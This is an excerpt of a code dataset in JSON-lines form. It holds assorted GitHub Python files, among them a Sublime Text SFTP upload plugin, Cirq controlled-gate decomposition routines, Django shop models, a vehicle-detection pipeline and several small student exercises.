pretty print for debugging\"\n from pprint import pprint\n\n if label:\n print((\"# DEBUG: {}\".format(label)))\n pprint(text)\n\n if exit_:\n pass\n\n\ndef debug(text):\n if sublime.load_settings(SETTINGS).get(\"debug\"):\n print(\"SFTP: \" + text)\n\n\nclass SftpException(Exception):\n pass\n\n\nclass Connection(object):\n def __init__(self, settings):\n self.settings = settings\n self.reset()\n\n def reset(self):\n self.client = None\n self.connection = None\n self.pkey = None\n\n def upload(self, src, dst):\n if self.connection is not None:\n try:\n transport = self.client.get_transport()\n transport.send_ignore()\n except EOFError as e:\n debug(\"Connection reset ({})\".format())\n self.reset()\n\n if self.connection is None:\n self.client = paramiko.SSHClient()\n\n if self.settings[\"knownHostsPath\"] is not None:\n self.client.load_host_keys(self.settings[\"knownHostsPath\"])\n else:\n self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n if self.settings[\"privateKeyPath\"] is not None:\n self.pkey = paramiko.RSAKey.from_private_key_file(self.settings[\"privateKeyPath\"])\n\n self.client.connect(\n self.settings[\"host\"],\n port=self.settings[\"port\"],\n username=self.settings[\"username\"],\n password=self.settings[\"password\"],\n pkey=self.pkey,\n timeout=self.settings[\"connectTimeout\"],\n )\n\n self.connection = self.client.open_sftp()\n debug(\"New connection open ({})\".format(self.settings[\"name\"]))\n else:\n debug(\"Connection reused ({})\".format(self.settings[\"name\"]))\n\n try:\n self.connection.put(str(src), str(dst))\n except FileNotFoundError:\n dst_path = dst.relative_to(self.settings[\"remotePath\"])\n for parent in list(reversed(dst_path.parents))[1:]:\n p = \"{}/{}\".format(self.settings[\"remotePath\"], parent)\n try:\n self.connection.listdir(p)\n except FileNotFoundError:\n self.connection.mkdir(p)\n if self.settings[\"directoryPermissions\"] is not None:\n self.connection.chmod(p, int(self.settings[\"directoryPermissions\"], 8))\n\n self.connection.put(str(src), str(dst))\n\n if self.settings[\"filePermissions\"] is not None:\n self.connection.chmod(str(dst), int(self.settings[\"filePermissions\"], 8))\n\n debug(\"{} → {}\".format(src.relative_to(self.settings[\"projectPath\"]), dst))\n\n return True\n\n\nclass Repository(object):\n connections = {}\n\n def __init__(self, name):\n if not name:\n raise SftpException(\"Field 'name' is missing in sftp.json\")\n\n self.name = name\n\n def init(self, user_settings):\n settings = DEFAULTS.copy()\n settings.update(user_settings)\n\n for key in [\"username\", \"host\", \"remotePath\"]:\n if not settings[key]:\n raise SftpException(\"Field '{}' is required\".format(key))\n\n self.connections[self.name] = Connection(settings)\n\n return settings\n\n def get_connection(self):\n return self.connections[self.name]\n\n def get_project_path(self):\n return self.connections[self.name].settings[\"projectPath\"]\n\n def get_remote_path(self):\n return self.connections[self.name].settings[\"remotePath\"]\n\n\nclass QuickSftpUploadCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n try:\n file_name = Path(self.view.file_name())\n except TypeError:\n self.view.erase_status(LABEL)\n return False\n\n try:\n name = self.view.settings().get(LABEL)[\"name\"]\n except TypeError:\n return False\n\n try:\n repository = Repository(name)\n try:\n connection = repository.get_connection()\n except KeyError:\n self.view.run_command(INIT_COMMAND)\n try:\n connection = repository.get_connection()\n except KeyError:\n raise SftpException(\"Init failed\")\n\n connection = repository.get_connection()\n project_path = connection.settings[\"projectPath\"]\n remote_path = PurePosixPath(connection.settings[\"remotePath\"])\n\n src = file_name\n relativeSrc = PurePosixPath(src.relative_to(project_path))\n\n for pattern in connection.settings[\"ignore\"]:\n if re.search(pattern, str(relativeSrc)):\n debug(\"Ignored file {}\".format(relativeSrc))\n return\n\n dst = remote_path / relativeSrc\n\n connection.upload(src, dst)\n except Exception as ex:\n self.view.set_status(LABEL, \"SFTP: {}\".format(str(ex)))\n raise\n else:\n self.view.set_status(LABEL, \"done {}\".format(file_name.name))\n sublime.set_timeout(lambda: self.view.set_status(LABEL, \"SFTP\"), 3000)\n\n\nclass QuickSftpInitCommand(sublime_plugin.TextCommand):\n def run(self, edit):\n try:\n file_name = Path(self.view.file_name())\n except TypeError:\n self.view.erase_status(LABEL)\n return False\n\n for dir in file_name.parents:\n json_path = dir / \".sublime\" / \"sftp.json\"\n if json_path.exists():\n debug(\"Found settings in {}\".format(json_path))\n with json_path.open() as fp:\n try:\n settings = json.load(fp)\n if \"name\" not in settings:\n raise ValueError(\"Field 'name' is missing in sftp.json\")\n except ValueError as ex:\n self.view.set_status(LABEL, \"SFTP: {}\".format(str(ex)))\n raise\n\n settings[\"projectPath\"] = dir\n\n repository = Repository(settings[\"name\"])\n settings = repository.init(settings)\n\n self.view.settings().set(\n LABEL, {\"name\": settings[\"name\"], \"uploadOnSave\": settings[\"uploadOnSave\"]}\n )\n self.view.set_status(LABEL, \"SFTP\")\n\n break\n\n\nclass QuickSftpEventListener(sublime_plugin.EventListener):\n def on_load_async(self, view):\n if not view.settings().has(LABEL):\n view.run_command(INIT_COMMAND)\n\n def on_pre_save_async(self, view):\n if view.settings().has(LABEL) and view.file_name() is not None:\n if view.settings().get(LABEL)[\"uploadOnSave\"] is True:\n view.set_status(LABEL, \"local → remote {}\".format(Path(view.file_name()).name))\n\n def on_post_save_async(self, view):\n if view.settings().has(LABEL):\n if view.settings().get(LABEL)[\"uploadOnSave\"] is True:\n view.run_command(UPLOAD_COMMAND)\n","repo_name":"dabekf/QuickSFTP","sub_path":"QuickSFTP.py","file_name":"QuickSFTP.py","file_ext":"py","file_size_in_byte":7789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23038862120","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n#Here is how I import pandas into Jupyter notebook\nimport pandas as pd\n\n\n# In[3]:\n\n\n#This is how you make the dataset actually usable for commands\nbison = pd.read_csv('/Users/wario5551/Downloads/BisonTracking.csv')\n\n\n# In[23]:\n\n\n#This is how I found the top 7 rows in the dataset\nbison.head(7)\n\n\n# In[6]:\n\n\n#This is how I found the last 10 rows in the dataset\nbison.tail(10)\n\n\n# In[8]:\n\n\n#This shows how many columns are in the dataset\nlen(bison.columns)\n\n\n# In[9]:\n\n\n#This shows how many rows are in the dataset\nlen(bison)\n\n\n# In[12]:\n\n\n#This is the standard deviation of length\nbison.Length.std()\n\n\n# In[13]:\n\n\n#This is the mean of length\nbison.Length.mean()\n\n\n# In[20]:\n\n\n#This commands shows how many of each bison specie is mentioned, there are\n#a total of 633 that are antiquus\nbison.Species.value_counts()\n\n\n# In[21]:\n\n\n#This is the median of length\nbison.Length.median()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Wario5551/Lesson-8-Hands-On","sub_path":"lesson_eight_handson.py","file_name":"lesson_eight_handson.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5994500255","text":"from typing import List\n\nimport pytorch_lightning as pl\nimport torch\nimport random\nfrom torch import FloatTensor, LongTensor\n\nfrom bttr.utils import Hypothesis\nfrom einops.einops import rearrange\n\nfrom .decoder import Decoder\nfrom .encoder import Encoder\nfrom .encoderT import EncoderT\nfrom .labelimg import Up\n\nclass BTTR(pl.LightningModule):\n def __init__(\n self,\n d_model: int,\n growth_rate: int,\n num_layers: int,\n nhead: int,\n num_decoder_layers: int,\n dim_feedforward: int,\n dropout: float,\n ):\n super().__init__()\n\n self.encoder = Encoder(\n d_model=d_model, growth_rate=growth_rate, num_layers=num_layers\n )\n self.encoderT = EncoderT(d_model=d_model, nhead=nhead, d_hid=dim_feedforward, nlayers=num_layers)\n self.decoder = Decoder(\n d_model=d_model,\n nhead=nhead,\n num_decoder_layers=num_decoder_layers,\n dim_feedforward=dim_feedforward,\n dropout=dropout,\n )\n self.up = Up(in_channels=d_model)\n\n def forward(\n self, img: FloatTensor, img_mask: LongTensor, tgt: LongTensor, outinput: LongTensor\n ) -> FloatTensor:\n \"\"\"run img and bi-tgt\n\n Parameters\n ----------\n img : FloatTensor\n [b, 1, h, w]\n img_mask: LongTensor\n [b, h, w]\n tgt : LongTensor\n [2b, l]\n\n Returns\n -------\n FloatTensor\n [2b, l, vocab_size]\n \"\"\"\n feature1, mask = self.encoder(img, img_mask) # [b, t, d]\n feature = rearrange(feature1, \"b h w d -> b (h w) d\")\n mask = rearrange(mask, \"b h w -> b (h w)\")\n # # 双方向,匹配tgt \n feature = torch.cat((feature, feature), dim=0) # [2b, t, d]s\n mask = torch.cat((mask, mask), dim=0)\n # 文本信息,注意由于基于tgt encode, tgt 本身已经���过l2r + r2l, size = [2b,l,d]\n featureT = self.encoderT(outinput)\n maskT = (outinput == 0)\n featureT = torch.cat((featureT, featureT), dim=0) # [2b, t, d]\n maskT = torch.cat((maskT, maskT), dim=0)\n # 文本与图片encode结合\n feature = torch.cat((feature, featureT), dim=1)\n mask = torch.cat((mask, maskT), dim=1)\n \n out = self.decoder(feature, mask, tgt)\n feature2 = rearrange(feature1,\"b h w d -> b d h w\")\n reimg = self.up(feature2)\n # img = self.GetImage(feature, mask, tgt)\n return out, reimg\n\n def beam_search(\n self, img: FloatTensor, img_mask: LongTensor, beam_size: int, max_len: int\n ) -> List[Hypothesis]:\n \"\"\"run bi-direction beam search for given img\n\n Parameters\n ----------\n img : FloatTensor\n [1, 1, h', w']\n img_mask: LongTensor\n [1, h', w']\n beam_size : int\n max_len : int\n\n Returns\n -------\n List[Hypothesis]\n \"\"\"\n feature, mask = self.encoder(img, img_mask) # [1, t, d]\n feature = rearrange(feature, \"b h w d -> b (h w) d\")\n mask = rearrange(mask, \"b h w -> b (h w)\")\n return self.decoder.beam_search(feature, mask, beam_size, max_len)\n","repo_name":"ToxicYP/XInput","sub_path":"bttr/model/bttr.py","file_name":"bttr.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19334143010","text":"class operar():\n\n def __init__(self):\n self.valor1 = 0\n self.valor2 = 0\n self.resultado = 0\n\n def cargar1(self):\n self.valor1 = int(input(\"Ingrese un valor: \"))\n\n def cargar2(self):\n self.valor2 = int(input(\"Ingrese otro valor: \"))\n\n def operar(self):\n pass\n\n def mostrar_resultado(self):\n print(\"El resultado es: \", self.resultado)\n\nclass suma(operar):\n\n def operar(self):\n self.resultado = self.valor1 + self.valor2\n\nclass resta(operar):\n\n def operar(self):\n self.resultado = self.valor1 - self.valor2\n\nclass division(operar):\n\n def operar(self):\n self.resultado = self.valor1 / self.valor2\n\nclass multiplicacion(operar):\n\n def operar(self):\n self.resultado = self.valor1 * self.valor2\n\nsuma1 = suma()\nsuma1.cargar1()\nsuma1.cargar2()\nsuma1.operar()\nsuma1.mostrar_resultado()\nprint(\"\")\n\nresta1= resta()\nresta1.cargar1()\nresta1.cargar2()\nresta1.operar()\nresta1.mostrar_resultado()\nprint(\"\")\n\ndivision1 = division()\ndivision1.cargar1()\ndivision1.cargar2()\ndivision1.operar()\ndivision1.mostrar_resultado()\nprint(\"\")\n\nmultiplicacion1 = multiplicacion()\nmultiplicacion1.cargar1()\nmultiplicacion1.cargar2()\nmultiplicacion1.operar()\nmultiplicacion1.mostrar_resultado()","repo_name":"Emrys2023/Primer-proyecto","sub_path":"7-7.py","file_name":"7-7.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22177766156","text":"from typing import List, Tuple, TYPE_CHECKING\n\nimport numpy as np\n\nfrom cirq import ops\nfrom cirq.linalg import is_unitary, is_special_unitary, map_eigenvalues\nfrom cirq.protocols import unitary\n\nif TYPE_CHECKING:\n import cirq\n\n\ndef _unitary_power(matrix: np.ndarray, power: float) -> np.ndarray:\n return map_eigenvalues(matrix, lambda e: e**power)\n\n\ndef _is_identity(matrix):\n \"\"\"Checks whether M is identity.\"\"\"\n return np.allclose(matrix, np.eye(matrix.shape[0]))\n\n\ndef _flatten(x):\n return sum(x, [])\n\n\ndef _decompose_abc(matrix: np.ndarray) -> Tuple[np.ndarray, np.ndarray, np.ndarray, float]:\n \"\"\"Decomposes 2x2 unitary matrix.\n\n Returns 2x2 special unitary matrices A, B, C and phase delta, such that:\n * ABC = I.\n * AXBXC * exp(1j*delta) = matrix.\n\n See [1], chapter 4.\n \"\"\"\n assert matrix.shape == (2, 2)\n delta = np.angle(np.linalg.det(matrix)) * 0.5\n alpha = np.angle(matrix[0, 0]) + np.angle(matrix[0, 1]) - 2 * delta\n beta = np.angle(matrix[0, 0]) - np.angle(matrix[0, 1])\n\n m00_abs = np.abs(matrix[0, 0])\n if np.abs(m00_abs - 1.0) < 1e-9:\n m00_abs = 1\n theta = 2 * np.arccos(m00_abs)\n\n a = unitary(ops.rz(-alpha)) @ unitary(ops.ry(-theta / 2))\n b = unitary(ops.ry(theta / 2)) @ unitary(ops.rz((alpha + beta) / 2))\n c = unitary(ops.rz((alpha - beta) / 2))\n\n x = unitary(ops.X)\n assert np.allclose(a @ b @ c, np.eye(2), atol=1e-2)\n assert np.allclose((a @ x @ b @ x @ c) * np.exp(1j * delta), matrix, atol=1e-2)\n\n return a, b, c, delta\n\n\ndef _decompose_single_ctrl(\n matrix: np.ndarray, control: 'cirq.Qid', target: 'cirq.Qid'\n) -> List['cirq.Operation']:\n \"\"\"Decomposes controlled gate with one control.\n\n See [1], chapter 5.1.\n \"\"\"\n a, b, c, delta = _decompose_abc(matrix)\n\n result = [\n ops.ZPowGate(exponent=delta / np.pi).on(control),\n ops.MatrixGate(c).on(target),\n ops.CNOT.on(control, target),\n ops.MatrixGate(b).on(target),\n ops.CNOT.on(control, target),\n ops.MatrixGate(a).on(target),\n ]\n\n # Remove no-ops.\n result = [g for g in result if not _is_identity(unitary(g))]\n\n return result\n\n\ndef _ccnot_congruent(c0: 'cirq.Qid', c1: 'cirq.Qid', target: 'cirq.Qid') -> List['cirq.Operation']:\n \"\"\"Implements 3-qubit gate 'congruent' to CCNOT.\n\n Returns sequence of operations which is equivalent to applying\n CCNOT(c0, c1, target) and multiplying phase of |101> sate by -1.\n See lemma 6.2 in [1].\"\"\"\n return [\n ops.ry(-np.pi / 4).on(target),\n ops.CNOT(c1, target),\n ops.ry(-np.pi / 4).on(target),\n ops.CNOT(c0, target),\n ops.ry(np.pi / 4).on(target),\n ops.CNOT(c1, target),\n ops.ry(np.pi / 4).on(target),\n ]\n\n\ndef decompose_multi_controlled_x(\n controls: List['cirq.Qid'], target: 'cirq.Qid', free_qubits: List['cirq.Qid']\n) -> List['cirq.Operation']:\n \"\"\"Implements action of multi-controlled Pauli X gate.\n\n Result is guaranteed to consist exclusively of 1-qubit, CNOT and CCNOT\n gates.\n If `free_qubits` has at least 1 element, result has lengts\n O(len(controls)).\n\n Args:\n controls - control qubits.\n targets - target qubits.\n free_qubits - qubits which are neither controlled nor target. Can be\n modified by algorithm, but will end up in their initial state.\n \"\"\"\n m = len(controls)\n if m == 0:\n return [ops.X.on(target)]\n elif m == 1:\n return [ops.CNOT.on(controls[0], target)]\n elif m == 2:\n return [ops.CCNOT.on(controls[0], controls[1], target)]\n\n m = len(controls)\n n = m + 1 + len(free_qubits)\n if (n >= 2 * m - 1) and (m >= 3):\n # See [1], Lemma 7.2.\n gates1 = [\n _ccnot_congruent(controls[m - 2 - i], free_qubits[m - 4 - i], free_qubits[m - 3 - i])\n for i in range(m - 3)\n ]\n gates2 = _ccnot_congruent(controls[0], controls[1], free_qubits[0])\n gates3 = _flatten(gates1) + gates2 + _flatten(gates1[::-1])\n first_ccnot = ops.CCNOT(controls[m - 1], free_qubits[m - 3], target)\n return [first_ccnot, *gates3, first_ccnot, *gates3]\n elif len(free_qubits) >= 1:\n # See [1], Lemma 7.3.\n m1 = n // 2\n free1 = controls[m1:] + [target] + free_qubits[1:]\n ctrl1 = controls[:m1]\n part1 = decompose_multi_controlled_x(ctrl1, free_qubits[0], free1)\n free2 = controls[:m1] + free_qubits[1:]\n ctrl2 = controls[m1:] + [free_qubits[0]]\n part2 = decompose_multi_controlled_x(ctrl2, target, free2)\n return [*part1, *part2, *part1, *part2]\n else:\n # No free qubits - must use general algorithm.\n # This will never happen if called from main algorithm and is added\n # only for completeness.\n return decompose_multi_controlled_rotation(unitary(ops.X), controls, target)\n\n\ndef _decompose_su(\n matrix: np.ndarray, controls: List['cirq.Qid'], target: 'cirq.Qid'\n) -> List['cirq.Operation']:\n \"\"\"Decomposes controlled special unitary gate into elementary gates.\n\n Result has O(len(controls)) operations.\n See [1], lemma 7.9.\n \"\"\"\n assert matrix.shape == (2, 2)\n assert is_special_unitary(matrix)\n assert len(controls) >= 1\n\n a, b, c, _ = _decompose_abc(matrix)\n\n cnots = decompose_multi_controlled_x(controls[:-1], target, [controls[-1]])\n return [\n *_decompose_single_ctrl(c, controls[-1], target),\n *cnots,\n *_decompose_single_ctrl(b, controls[-1], target),\n *cnots,\n *_decompose_single_ctrl(a, controls[-1], target),\n ]\n\n\ndef _decompose_recursive(\n matrix: np.ndarray,\n power: float,\n controls: List['cirq.Qid'],\n target: 'cirq.Qid',\n free_qubits: List['cirq.Qid'],\n) -> List['cirq.Operation']:\n \"\"\"Decomposes controlled unitary gate into elementary gates.\n\n Result has O(len(controls)^2) operations.\n See [1], lemma 7.5.\n \"\"\"\n if len(controls) == 1:\n return _decompose_single_ctrl(_unitary_power(matrix, power), controls[0], target)\n\n cnots = decompose_multi_controlled_x(controls[:-1], controls[-1], free_qubits + [target])\n return [\n *_decompose_single_ctrl(_unitary_power(matrix, 0.5 * power), controls[-1], target),\n *cnots,\n *_decompose_single_ctrl(_unitary_power(matrix, -0.5 * power), controls[-1], target),\n *cnots,\n *_decompose_recursive(\n matrix, 0.5 * power, controls[:-1], target, [controls[-1]] + free_qubits\n ),\n ]\n\n\ndef decompose_multi_controlled_rotation(\n matrix: np.ndarray, controls: List['cirq.Qid'], target: 'cirq.Qid'\n) -> List['cirq.Operation']:\n \"\"\"Implements action of multi-controlled unitary gate.\n\n Returns a sequence of operations, which is equivalent to applying\n single-qubit gate with matrix `matrix` on `target`, controlled by\n `controls`.\n\n Result is guaranteed to consist exclusively of 1-qubit, CNOT and CCNOT\n gates.\n\n If matrix is special unitary, result has length `O(len(controls))`.\n Otherwise result has length `O(len(controls)**2)`.\n\n References:\n [1] Barenco, Bennett et al.\n Elementary gates for quantum computation. 1995.\n https://arxiv.org/pdf/quant-ph/9503016.pdf\n\n Args:\n matrix - 2x2 numpy unitary matrix (of real or complex dtype).\n controls - control qubits.\n targets - target qubits.\n\n Returns:\n A list of operations which, applied in a sequence, are equivalent to\n applying `MatrixGate(matrix).on(target).controlled_by(*controls)`.\n \"\"\"\n assert is_unitary(matrix)\n assert matrix.shape == (2, 2)\n\n if len(controls) == 0:\n return [ops.MatrixGate(matrix).on(target)]\n elif len(controls) == 1:\n return _decompose_single_ctrl(matrix, controls[0], target)\n elif is_special_unitary(matrix):\n return _decompose_su(matrix, controls, target)\n else:\n return _decompose_recursive(matrix, 1.0, controls, target, [])\n","repo_name":"quantumlib/Cirq","sub_path":"cirq-core/cirq/transformers/analytical_decompositions/controlled_gate_decomposition.py","file_name":"controlled_gate_decomposition.py","file_ext":"py","file_size_in_byte":7969,"program_lang":"python","lang":"en","doc_type":"code","stars":3974,"dataset":"github-code","pt":"77"} +{"seq_id":"20339393249","text":"#Gerar média\n\ndef gerarMedia():\n lista = []\n for i in range(3):\n nota = float(input('Informe a nota: '))\n lista.append(nota)\n media = sum(lista) / len(lista)\n print(f'Média final: {media}')\n\ngerarMedia()\n","repo_name":"MPaulino1/activitiesPython","sub_path":"list_1.py","file_name":"list_1.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39268040996","text":"from django.db import models\nfrom django.forms import ModelForm, TextInput\nfrom core.models import Product\nfrom account.models import UserRegistration\n\nSTATUS = (\n ('In Progress', 'In Progress'),\n ('Canceled', 'Canceled'),\n ('Delayed', 'Delayed'),\n ('Delivered', 'Delivered'),\n)\n\n\nclass ShopCart(models.Model):\n user_id = models.ForeignKey(\n UserRegistration, on_delete=models.SET_NULL, null=True)\n product_cart = models.ForeignKey(\n Product, on_delete=models.SET_NULL, null=True)\n quantity = models.IntegerField()\n create_at = models.DateTimeField(auto_now_add=True)\n modified = models.DateTimeField(auto_now=True)\n Gender_Choiced = models.CharField(max_length=250, blank=True, null=True)\n color_Choiced = models.CharField(max_length=250, blank=True, null=True)\n size_Choiced = models.CharField(max_length=250, blank=True, null=True)\n\n def __str__(self):\n return self.product_cart.name\n\n @property\n def price(self):\n return (self.product_cart.price)\n\n @property\n def amount(self):\n subtotal = 0\n if self.product_cart.discount_price:\n subtotal = self.product_cart.discount_price * self.quantity\n else:\n subtotal = self.price * self.quantity\n\n return subtotal\n\n\nclass Order(models.Model):\n\n user = models.ForeignKey(UserRegistration, on_delete=models.CASCADE)\n first_name = models.CharField(max_length=20)\n last_name = models.CharField(max_length=30)\n email = models.CharField(max_length=80, blank=True)\n phone = models.CharField(max_length=15)\n address = models.CharField(max_length=150)\n city = models.CharField(max_length=40)\n zip_code = models.CharField(max_length=8, blank=True)\n total = models.FloatField()\n note = models.TextField(null=True, default=\"\", blank=True)\n status = models.CharField(\n choices=STATUS, default='In Progress', max_length=15)\n create_at = models.DateTimeField(auto_now_add=True)\n modified = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.user.username + ' - ' + str(self.total)\n\n\nclass OrderDetail(models.Model):\n\n order = models.ForeignKey(Order, on_delete=models.CASCADE)\n user = models.ForeignKey(UserRegistration, on_delete=models.CASCADE)\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n quantity = models.IntegerField()\n price = models.FloatField()\n total = models.FloatField()\n deliver_time = models.DateField()\n create_at = models.DateTimeField(auto_now_add=True)\n modified = models.DateTimeField(auto_now=True)\n color_Choiced = models.CharField(max_length=250,blank=True, null=True)\n size_Choiced = models.CharField(max_length=250,blank=True, null=True)\n\n def __str__(self):\n return self.product.name\n\n @property\n def amount(self):\n if self.product.discount_price:\n return (self.product.discount_price * self.quantity)\n\n else:\n return (self.product.price * self.quantity)\n\n\nclass OrderForm(ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(OrderForm, self).__init__(*args, **kwargs)\n self.fields['note'].required = False\n\n class Meta:\n model = Order\n fields = ['first_name', 'last_name', 'email', 'phone',\n 'address', 'city', 'zip_code', 'note']\n widgets = {\n 'first_name': TextInput(attrs={'class': 'input'}),\n 'last_name': TextInput(attrs={'class': 'input'}),\n 'email': TextInput(attrs={'class': 'input'}),\n 'phone': TextInput(attrs={'class': 'input'}),\n 'address': TextInput(attrs={'class': 'input'}),\n 'city': TextInput(attrs={'class': 'input'}),\n 'zip_code': TextInput(attrs={'class': 'input'}),\n 'note': TextInput(attrs={'class': 'input'}),\n }\n\n\nclass ShopCartForm(ModelForm):\n class Meta:\n model = ShopCart\n fields = ['quantity', 'Gender_Choiced',\n 'color_Choiced', 'size_Choiced']\n","repo_name":"Hamzahalmasri1/E-mall_Django","sub_path":"order/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29332628269","text":"#Aprobación de créditos\ningresoenpesos = int(input(\"ingreso en pesos\"))\nañodenacimiento = int(input(\"ingrse el año de nacimiento\"))\nnumerosdehijos = int(input(\"ingrese el numeros de hijos\"))\nañosdepertenenciaenelbanco = int(input(\"años de pertenencia en el banco:\"))\nestadocivil = input(\"S:soltero,C:casado\")\nsiviveencamponoenunaciudad = input(\"U:urbano,R:rural\")\nañosdeedad = 2022-añodenacimiento\nif (103 and 55>añosdeedad>45):\n print(f\"APROBADO\")\nelif (ingresoenpesos>3500000 and añosdepertenenciaenelbanco>5):\n print(f\"APROBADO\")\nelse:\n print(\"RECHAZADO\")\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej3/hito1_ej3_f5e311b162834fbd8dcbd38d71ec1b47.py","file_name":"hito1_ej3_f5e311b162834fbd8dcbd38d71ec1b47.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32882188057","text":"import numpy as np\nfrom collections import deque\nfrom moviepy.editor import VideoFileClip\nfrom scipy.ndimage.measurements import label\n\nfrom lesson_utils import search_windows, add_heat, heat_map_bbox, draw_boxes\n\ndef pipeline_single_img(img, windows, clf, **kwargs):\n car_windows = search_windows(img, windows, clf, **kwargs)\n car_hm_bboxes = heat_map_bbox(img, car_windows)\n return draw_boxes(img, car_hm_bboxes)\n\ndef pipeline_video(video_file, out_file, windows, clf, **kwargs):\n clip = VideoFileClip(video_file)\n\n process_image = lambda raw_rgb: pipeline_single_img(raw_rgb, windows, clf, **kwargs)\n clip_lane_line = clip.fl_image(process_image)\n\n clip_lane_line.write_videofile(out_file, audio=False)\n print('File is saved to {}'.format(out_file))\n\nclass BoundingBoxes(object):\n def __init__(self, img_shape, max_frames = 6, threshold=3):\n self._img_shape = img_shape\n self._frame_bboxes = deque([], maxlen=max_frames)\n self._threshold = threshold\n\n def append(self, bboxes):\n self._frame_bboxes.append(bboxes)\n\n def get_heatmap(self):\n heatmap = np.zeros(self._img_shape, dtype=np.float32)\n for frame_bboxes in self._frame_bboxes:\n # Add += 1 for all pixels inside each bbox\n # Assuming each \"box\" takes the form ((x1, y1), (x2, y2))\n for bbox in frame_bboxes:\n heatmap[bbox[0][1]:bbox[1][1], bbox[0][0]:bbox[1][0]] += 1\n\n # apply threshold\n heatmap[heatmap <= self._threshold] = 0\n\n # Visualize the heatmap when displaying\n heatmap = np.clip(heatmap, 0, 255)\n return heatmap\n\n def get_bboxes(self):\n heatmap = self.get_heatmap()\n\n # Find final boxes from heatmap using label function\n labels = label(heatmap)\n\n hm_bboxes = []\n\n # iterate through all detected cars\n for car_number in range(1, labels[1] + 1):\n nonzero = (labels[0] == car_number).nonzero()\n # Identify x and y values of those pixels\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n # Define a bounding box based on min/max x and y\n bbox = ((np.min(nonzerox), np.min(nonzeroy)), (np.max(nonzerox), np.max(nonzeroy)))\n hm_bboxes.append(bbox)\n\n return hm_bboxes\n\ndef pipeline_single_img_memory(img, bboxes, windows, clf, **kwargs):\n car_windows = search_windows(img, windows, clf, **kwargs)\n # update new bounding boxes\n bboxes.append(car_windows)\n # integrate over frame\n car_hm_bboxes = bboxes.get_bboxes()\n\n return draw_boxes(img, car_hm_bboxes)\n\ndef pipeline_imgs(imgs, windows, clf, bboxes_setting, **kwargs):\n img_shape, max_frames, threshold = bboxes_setting\n bboxes = BoundingBoxes(img_shape, max_frames=max_frames, threshold=threshold)\n\n out_imgs = []\n cmaps = []\n out_labels = []\n for i,img in enumerate(imgs):\n car_windows = search_windows(img, windows, clf, **kwargs)\n hm = np.zeros(img_shape, dtype=np.float32)\n add_heat(hm, car_windows)\n hm = np.clip(hm, 0, 255)\n out_imgs += [draw_boxes(img, car_windows, color=(0.0,0.0,1.0), thick=3), hm]\n cmaps += [None, 'hot']\n out_labels += ['frame {}'.format(i), 'heat-map frame {}'.format(i)]\n\n # update new bounding boxes\n bboxes.append(car_windows)\n\n out_imgs += [draw_boxes(imgs[-1], bboxes.get_bboxes(), thick=3), bboxes.get_heatmap()]\n cmaps += [None, 'hot']\n out_labels += ['last frame', 'heat-map last frame']\n return out_imgs, out_labels, cmaps\n\n\ndef pipeline_video_memory(video, out_file, windows, clf, bboxes_setting, **kwargs):\n if isinstance(video, str):\n clip = VideoFileClip(video)\n elif isinstance(video, VideoFileClip):\n clip = video\n\n\n img_shape, max_frames, threshold = bboxes_setting\n bboxes = BoundingBoxes(img_shape, max_frames=max_frames, threshold=threshold)\n\n process_image = lambda raw_rgb: pipeline_single_img_memory(raw_rgb, bboxes, windows, clf, **kwargs)\n clip_lane_line = clip.fl_image(process_image)\n\n clip_lane_line.write_videofile(out_file, audio=False)\n print('File is saved to {}'.format(out_file))\n\n","repo_name":"minh84/udacity_carnd","sub_path":"CarND-P5-Vehicle-Detection/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"48324633403","text":"\"\"\"\nsqlalchemy events module.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom uuid import uuid4\nimport traceback\n\ntry:\n from psycopg2.extensions import parse_dsn\n\nexcept ImportError:\n def parse_dsn(dsn):\n \"\"\"\n Parse the DSN.\n :param dsn: input DSN.\n :return:\n \"\"\"\n return dict(\n attribute.split('=') for attribute in dsn.split()\n if '=' in attribute\n )\n\nfrom ..trace import trace_factory\nfrom ..event import BaseEvent\nfrom ..utils import database_connection_type, print_debug\n\nMAX_QUERY_SIZE = 2048\n\n\nclass DBAPIEvent(BaseEvent):\n \"\"\"\n Represents base sqlalchemy event.\n \"\"\"\n\n ORIGIN = 'dbapi'\n RESOURCE_TYPE = 'database'\n RESOURCE_OPERATION = None\n\n # mapping SQL commands to words preceding the table name in the query\n # Note: Not supporting advanced syntax of select and delete (as 'delete\n # from only ..')\n _OPERATION_TO_TABLE_NAME_KEYWORD = {\n 'select': 'from',\n 'insert': 'into',\n 'update': 'update',\n 'delete': 'from',\n 'create': 'table'\n }\n\n def __init__(\n self,\n connection,\n cursor,\n _args,\n _kwargs,\n start_time,\n exception\n ):\n \"\"\"\n Initialize.\n :param connection: The SQL engine the event is using\n :param cursor: Cursor object used in the even\n :param args: args passed to called function\n :param kwargs: kwargs passed to called function\n :param start_time: Start timestamp (epoch)\n :param exception: Exception (if 